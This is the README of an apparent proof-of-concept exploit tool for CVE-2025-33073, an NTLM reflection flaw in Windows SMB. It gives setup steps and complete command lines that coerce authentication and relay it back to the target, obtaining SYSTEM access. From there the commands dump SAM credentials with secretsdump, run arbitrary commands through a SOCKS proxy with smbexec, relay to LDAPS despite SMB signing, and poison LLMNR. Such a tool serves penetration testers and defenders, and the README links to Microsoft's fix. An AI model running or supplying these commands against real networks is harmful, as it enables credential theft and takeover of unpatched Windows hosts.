# CVE-2025-33073
PoC Exploit for the NTLM reflection SMB flaw.

<img width="350" height="350" alt="image" src="https://github.com/user-attachments/assets/1c2beb03-c89a-48eb-ace3-639f0d185607" />

All credits go to the offical research:</br>
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

### Prerequisites
OS: Kali Linux (has most packages pre-installed).

* NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
* impacket-ntlmrelayx
* dnstool.py (included in repo)

### Setup
The tool will automatically use a virtual environment. To set it up, run:

```bash
./setup.sh
```

This will create a virtual environment and install all required dependencies including `ldap3-bleeding-edge==2.10.1.1337`.

### Example usage
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
```

<img width="1030" height="467" alt="image" src="https://github.com/user-attachments/assets/5ee804ec-a635-4d14-8458-610ad1de1a9b" />

**Custom command**</br>
Instead of running secretsdump a custom command can be executed.
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"
```
![image](https://github.com/user-attachments/assets/1a054df7-ba08-4c9c-a4cf-737eb0827534)

**SOCKS**</br>
For more stealthy execution of commands after valid connection as SYSTEM has been made. --target and --target-ip should be equal here.
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
```
![image](https://github.com/user-attachments/assets/8cf77803-f417-4abe-a993-746049b2634c)
Also a custom command can be ran through proxychains instead of dumping SAM.
```
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
```
![image](https://github.com/user-attachments/assets/6ecf0e32-ccd2-4a61-a024-644b214607ea)

### Exploit relay to LDAPS even with SMB Signing enabled
Research has been performed to see if the reflection really didnt work with SMB signing enabled which resulted in finding bugs where if SIGN/SEAL are removed from the packet it is possible to relay from SMB to LDAPS which is usually not possible due to MIC.

Thanks to:
- https://github.com/decoder-it/impacket-partial-mic/
- https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
- https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/

```
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
```
<img width="1726" height="981" alt="image" src="https://github.com/user-attachments/assets/2f84ad40-2ecd-4660-b10a-94eeaad2cc41" />

### Manual exploit without DNS requirement
If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.

![image](https://github.com/user-attachments/assets/20c81ea0-88bf-4334-98aa-d2cb93f473b1)


### Troubleshooting

* I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx try adding the host to your /etc/hosts file. This should result in the attack working.
* If using IP the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of failure. It's until now not perfectly clear why this happens. I think it has something to do with networking.
* Try another coerce method using -M or --method.

#### Wireshark

**Local NTLM authentication takes place**
![image](https://github.com/user-attachments/assets/0a3fe643-2d52-427a-91f2-991770732f62)

**Local NTLM authentication does not take place resulting in a FAILED attempt**
![image](https://github.com/user-attachments/assets/7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348)

#### Good to know
* DNS-record should also be known to the client, this can take more time in some occasions. With more time I mean give it a couple of minutes.
* This is just a PoC which means AV/EDR bypasses have not been tried to bypass. Use at own risk.
</br>

### How to fix
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073
